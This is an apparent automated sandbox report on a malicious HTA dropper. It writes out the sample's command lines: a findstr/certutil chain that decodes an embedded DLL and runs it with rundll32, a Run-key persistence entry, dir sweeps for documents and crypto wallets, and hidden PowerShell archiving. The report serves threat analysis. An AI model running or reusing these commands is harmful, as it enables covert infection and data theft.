Malware Analysis Report

2025-06-15 22:31

Sample ID 241102-jyrc5ssmcp
Target bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta
SHA256 bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234
Tags
collection defense_evasion discovery evasion execution persistence spyware stealer upx
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234

Threat Level: Likely malicious

The file bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta was found to be: Likely malicious.

Malicious Activity Summary

collection defense_evasion discovery evasion execution persistence spyware stealer upx

Command and Scripting Interpreter: PowerShell

Manipulates Digital Signatures

Blocklisted process makes network request

Looks for VMWare Tools registry key

Checks computer location settings

Loads dropped DLL

Reads user/profile data of web browsers

Deobfuscate/Decode Files or Information

Adds Run key to start application

Accesses Microsoft Outlook accounts

UPX packed file

Checks for VirtualBox DLLs, possible anti-VM trick

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Opens file in notepad (likely ransom note)

Modifies Internet Explorer settings

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-02 08:04

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-02 08:04

Reported

2024-11-02 08:07

Platform

win7-20240903-en

Max time kernel

149s

Max time network

152s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Looks for VMWare Tools registry key

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\VMware, Inc.\VMware Tools C:\Windows\system32\rundll32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Windows\system32\rundll32.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Windows\CurrentVersion\Run\Network Service = "rundll32 C:\\Users\\Admin\\AppData\\Local\\netserv32.dll,MainWork" C:\Windows\system32\rundll32.exe N/A

Deobfuscate/Decode Files or Information

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\certutil.exe N/A
N/A N/A C:\Windows\SysWOW64\certutil.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Windows\system32\rundll32.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\certutil.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\certutil.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\NOTEPAD.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\NOTEPAD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2496 wrote to memory of 2944 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2496 wrote to memory of 2944 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2496 wrote to memory of 2944 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2496 wrote to memory of 2944 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2496 wrote to memory of 3000 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2496 wrote to memory of 3000 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2496 wrote to memory of 3000 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2496 wrote to memory of 3000 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2944 wrote to memory of 2864 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2944 wrote to memory of 2864 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2944 wrote to memory of 2864 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2944 wrote to memory of 2864 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3000 wrote to memory of 2756 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3000 wrote to memory of 2756 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3000 wrote to memory of 2756 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3000 wrote to memory of 2756 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 2944 wrote to memory of 2984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\certutil.exe
PID 2944 wrote to memory of 2984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\certutil.exe
PID 2944 wrote to memory of 2984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\certutil.exe
PID 2944 wrote to memory of 2984 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\certutil.exe
PID 3000 wrote to memory of 2204 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\certutil.exe
PID 3000 wrote to memory of 2204 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\certutil.exe
PID 3000 wrote to memory of 2204 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\certutil.exe
PID 3000 wrote to memory of 2204 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\certutil.exe
PID 3000 wrote to memory of 2724 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 3000 wrote to memory of 2724 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 3000 wrote to memory of 2724 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 3000 wrote to memory of 2724 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 3000 wrote to memory of 2724 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 3000 wrote to memory of 2724 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 3000 wrote to memory of 2724 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\rundll32.exe
PID 2724 wrote to memory of 2844 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2724 wrote to memory of 2844 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2724 wrote to memory of 2844 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2724 wrote to memory of 2844 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2944 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 2944 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 2944 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 2944 wrote to memory of 2604 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 2844 wrote to memory of 1928 N/A C:\Windows\system32\rundll32.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 1928 N/A C:\Windows\system32\rundll32.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 1928 N/A C:\Windows\system32\rundll32.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2844 wrote to memory of 1828 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\cmd.exe
PID 2844 wrote to memory of 1828 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\cmd.exe
PID 2844 wrote to memory of 1828 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\cmd.exe
PID 2844 wrote to memory of 1732 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\cmd.exe
PID 2844 wrote to memory of 1732 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\cmd.exe
PID 2844 wrote to memory of 1732 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\cmd.exe
PID 2844 wrote to memory of 1260 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\cmd.exe
PID 2844 wrote to memory of 1260 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\cmd.exe
PID 2844 wrote to memory of 1260 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\cmd.exe
PID 2844 wrote to memory of 448 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\cmd.exe
PID 2844 wrote to memory of 448 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\cmd.exe
PID 2844 wrote to memory of 448 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\cmd.exe
PID 2844 wrote to memory of 2392 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\cmd.exe
PID 2844 wrote to memory of 2392 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\cmd.exe
PID 2844 wrote to memory of 2392 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\cmd.exe
PID 2844 wrote to memory of 2924 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\cmd.exe
PID 2844 wrote to memory of 2924 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\cmd.exe
PID 2844 wrote to memory of 2924 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\cmd.exe

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c cd /d C:\Users\Admin\AppData\Local\Temp & findstr /b "a2ZneGw7" "C:\Users\Admin\AppData\Local\Temp\bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta">1.log & certutil -decode -f 1.log password.txt & del 1.log && password.txt

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c cd /d C:\Users\Admin\AppData\Local & findstr /b "TVqQAAMAAA" "C:\Users\Admin\AppData\Local\Temp\bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta">1.log & certutil -decode -f 1.log netserv32.dll & del 1.log & rundll32 netserv32.dll,MainWork

C:\Windows\SysWOW64\findstr.exe

findstr /b "a2ZneGw7" "C:\Users\Admin\AppData\Local\Temp\bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta"

C:\Windows\SysWOW64\findstr.exe

findstr /b "TVqQAAMAAA" "C:\Users\Admin\AppData\Local\Temp\bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta"

C:\Windows\SysWOW64\certutil.exe

certutil -decode -f 1.log password.txt

C:\Windows\SysWOW64\certutil.exe

certutil -decode -f 1.log netserv32.dll

C:\Windows\SysWOW64\rundll32.exe

rundll32 netserv32.dll,MainWork

C:\Windows\system32\rundll32.exe

rundll32 netserv32.dll,MainWork

C:\Windows\SysWOW64\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\password.txt

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -w hidden Compress-Archive -CompressionLevel Optimal -Path "C:\Users\Admin\AppData\Local\Temp\nsv9B18.tmp" "C:\Users\Admin\AppData\Local\micro.log.zip"

C:\Windows\system32\cmd.exe

cmd.exe /c dir C:\Users\Admin\*.hwp C:\Users\Admin\*.pdf C:\Users\Admin\*.doc C:\Users\Admin\*.docx C:\Users\Admin\*.xls C:\Users\Admin\*.xlsx C:\Users\Admin\*.zip C:\Users\Admin\*.rar C:\Users\Admin\*.egg C:\Users\Admin\*.txt C:\Users\Admin\*.jpg C:\Users\Admin\*.png C:\Users\Admin\*.jpeg C:\Users\Admin\*.alz /s >> "c:\users\admin\appdata\local\netlist.log"

C:\Windows\system32\cmd.exe

cmd.exe /c dir C:\Users\Admin\*wallet* C:\Users\Admin\UTC--* /s >> "c:\users\admin\appdata\local\netlist.log"

C:\Windows\system32\cmd.exe

cmd.exe /c dir d:\*.hwp d:\*.pdf d:\*.doc d:\*.docx d:\*.xls d:\*.xlsx d:\*.zip d:\*.rar d:\*.egg d:\*.txt d:\*.jpg d:\*.png d:\*.jpeg d:\*.alz /s >> "c:\users\admin\appdata\local\netlist.log"

C:\Windows\system32\cmd.exe

cmd.exe /c dir d:\*wallet* d:\UTC--* /s >> "c:\users\admin\appdata\local\netlist.log"

C:\Windows\system32\cmd.exe

cmd.exe /c dir f:\*.hwp f:\*.pdf f:\*.doc f:\*.docx f:\*.xls f:\*.xlsx f:\*.zip f:\*.rar f:\*.egg f:\*.txt f:\*.jpg f:\*.png f:\*.jpeg f:\*.alz /s >> "c:\users\admin\appdata\local\netlist.log"

C:\Windows\system32\cmd.exe

cmd.exe /c dir f:\*wallet* f:\UTC--* /s >> "c:\users\admin\appdata\local\netlist.log"

Network

Country Destination Domain Proto
US 8.8.8.8:53 cdn.glitch.global udp
US 151.101.2.132:80 cdn.glitch.global tcp
US 131.153.13.235:80 131.153.13.235 tcp

Files

C:\Users\Admin\AppData\Local\Temp\1.log

MD5 2ac7510166832b4a6e4344f37d944578
SHA1 c766dd5112d72620614842d4bf0e986c34c5a2d0
SHA256 09e4c6d57fbf21a95fab469149ac50d73ee046f2bc2e57b6565eb0e9adf9e1ad
SHA512 ecb5c29e8e1d81b914b1d4c3e2787cf2b78d5707473f368aa48df6af1b7235adac5f96ccd43cfc0501f93640b52dd4b06905c889ffd0e9b7c989e150c89e521a

C:\Users\Admin\AppData\Local\1.log

MD5 71593a662d03e58b27b29ab199a6d7b5
SHA1 d24e55399d35ac3a25f1b6a8d3bdd0e3e37db5d2
SHA256 e6da91d2fc4d3029e3915e9f7fc9586bf76f8ee024082c05ee4e5bf0f174c237
SHA512 c8005c9131b575f15ccd8bcde0fe66f820fff8b4c54800fdcaf814c1aede5f98343854276c301210c0935bf2669f925eafc2ecd15ff88496ededd918bfca3b07

\Users\Admin\AppData\Local\netserv32.dll

MD5 56d4fcfa7eb3a84740081264c5c0f10a
SHA1 06edf5464d2cfe1a75f3600c9039eabab97248bd
SHA256 5a18a29791cfb18767a43bebb61f923e64be7988235213678514007174f60b3e
SHA512 df622d9aebc8b9367219777216ba7e21942974e048fa40233fb17d17a85d940f8301ab4c605703cfa4b9ffdc61f2095b2a96b6256d017b445e40e94aedfd8609

memory/2724-36-0x0000000000220000-0x000000000023F000-memory.dmp

memory/2724-33-0x0000000000220000-0x000000000023F000-memory.dmp

memory/2724-35-0x0000000000220000-0x000000000023F000-memory.dmp

memory/2724-34-0x0000000000220000-0x000000000023F000-memory.dmp

memory/2844-54-0x000007FEFB1B0000-0x000007FEFB1CF000-memory.dmp

memory/2844-53-0x000007FEF7DE0000-0x000007FEF7DFF000-memory.dmp

memory/2844-52-0x000007FEFB1B0000-0x000007FEFB1CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\password.txt

MD5 6a0e721cb89a06736206b91af92239cd
SHA1 bb87db8bbcb512a584c45c80504fc21a0a972b3a
SHA256 a5a56f7eed7db360188ca88386bed5c84a8146b99ece4e68a3abfdbb5f091015
SHA512 c9921cafd2a284c3bc32b845685e25f03bc9fbaa380dbecbe8bfd9ec4992d5cf4a832e462cf097bcbc12f1ae3b00a0c8e7688be373aede81a9bd331d400b6a0c

memory/2844-64-0x0000000180000000-0x0000000180127000-memory.dmp

C:\Users\Admin\AppData\Local\net

MD5 de9438683614ccf3f0316139418985a9
SHA1 dcbbfb18c16f4bf9025233e6ecf42be64c33932d
SHA256 d5ec8265369b5f52a14b039c1f9495a343a9755a89b0c48db5983c94d140f18b
SHA512 925a919ecbe169adc2ebb10b9f93cc33ab5ba44794d3fccd0d7f2faa49c8a35b46e3c6779d0e357122433461bf48fc4af2f9571fae0aa11fd85c9dcc26a47470

memory/2844-67-0x0000000180000000-0x0000000180127000-memory.dmp

memory/2844-68-0x0000000180000000-0x0000000180127000-memory.dmp

memory/1928-85-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

memory/1928-86-0x0000000002890000-0x0000000002898000-memory.dmp

memory/2724-92-0x0000000000220000-0x000000000023F000-memory.dmp

memory/2724-94-0x0000000000220000-0x000000000023F000-memory.dmp

C:\Users\Admin\AppData\Local\notepad.log

MD5 6199c9d0ad1df4105c85ae041e833a0e
SHA1 c9016a4bcd8bd2ea646dfa86e2c9c59cd9f50fd1
SHA256 c45b1bb615385f2b2b2c1bfb29646a89ef9beb9c4f00cbb5f16c02171c61bcf4
SHA512 b2b972ba63cfb93c6b59634ecf5f8ffda04c74ba9ee86dbd8fefea43ff408f86718a75a0e9282ba5fe122cb3079511847c6775393e1e2d5c556ec3e8ab599de3

memory/2844-101-0x0000000180000000-0x0000000180032000-memory.dmp

memory/2844-117-0x000007FEFB1B0000-0x000007FEFB1CF000-memory.dmp

memory/2844-119-0x000007FEFB1B0000-0x000007FEFB1CF000-memory.dmp

memory/2844-118-0x000007FEF7DE0000-0x000007FEF7DFF000-memory.dmp

memory/2844-121-0x000007FEF7DE0000-0x000007FEF7DFF000-memory.dmp

\??\c:\users\admin\appdata\local\netlist.log

MD5 4c3a362b3f3e30e0d09cf23cf206d4f3
SHA1 8c83105c017fdd64b2bc094f295bfaa8ce074b39
SHA256 47efee3b0891b28c7ad69ba95c06f5fd2a45e0df0e4ec62307a24793a51b52bd
SHA512 c78174e522de99a4774b764d0b465d8dc0035d4aa4e46a5306f3985afc814af0290c1af11b78c0656d6915b0ddc36ecc726a21666694ebecc87277120f9dfda4

\??\c:\users\admin\appdata\local\netlist.log

MD5 38eb30a99834452a25809864e7116beb
SHA1 80271700c164e13a7a871d8530a71898bf4a64bc
SHA256 77062eba27314013f04f6a3aad6c6d60d5e2a9a9a289ea34fd83e87ccf9167b0
SHA512 48e013c5ca505310ee98f059c84fc619e1e41b03ab3fc9248688194e75eaa8a56bc7a6a68cb100c42115170b5791ba29d66ad381f2e4298660f0c72f8c4ed208

memory/2844-134-0x000007FEF7DE0000-0x000007FEF7DFF000-memory.dmp

memory/2844-139-0x000007FEF7DE0000-0x000007FEF7DFF000-memory.dmp

memory/2844-140-0x000007FEF7DE0000-0x000007FEF7DFF000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-02 08:04

Reported

2024-11-02 08:07

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

155s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\bcdc99e0f17486aa5a5faa0b9e7d7ccbeaa5372626733433214bb722ba260234.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Looks for VMWare Tools registry key

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\VMware, Inc.\VMware Tools C:\Windows\system32\rundll32.exe N/A

Manipulates Digital Signatures

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.2!7\Name = "szOID_ROOT_PROGRAM_AUTO_UPDATE_END_REVOCATION" C:\Windows\SysWOW64\certutil.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.3!7\Name = "szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL" C:\Windows\SysWOW64\certutil.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.1!7\Name = "szOID_ROOT_PROGRAM_AUTO_UPDATE_CA_REVOCATION" C:\Windows\SysWOW64\certutil.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.2!7\Name = "szOID_ROOT_PROGRAM_AUTO_UPDATE_END_REVOCATION" C:\Windows\SysWOW64\certutil.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.3!7\Name = "szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL" C:\Windows\SysWOW64\certutil.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.1!7\Name = "szOID_ROOT_PROGRAM_AUTO_UPDATE_CA_REVOCATION" C:\Windows\SysWOW64\certutil.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\cmd.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Windows\system32\rundll32.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Network Service = "rundll32 C:\\Users\\Admin\\AppData\\Local\\netserv32.dll,MainWork" C:\Windows\system32\rundll32.exe N/A

Deobfuscate/Decode Files or Information

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\certutil.exe N/A
N/A N/A C:\Windows\SysWOW64\certutil.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Windows\system32\rundll32.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\certutil.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\certutil.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\NOTEPAD.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings C:\Windows\SysWOW64\cmd.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\NOTEPAD.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4064 wrote to memory of 4640 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 4064 wrote to memory of 4640 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 4064 wrote to memory of 4640 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 4064 wrote to memory of 5108 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 4064 wrote to memory of 5108 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 4064 wrote to memory of 5108 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 4640 wrote to memory of 2508 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 4640 wrote to memory of 2508 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
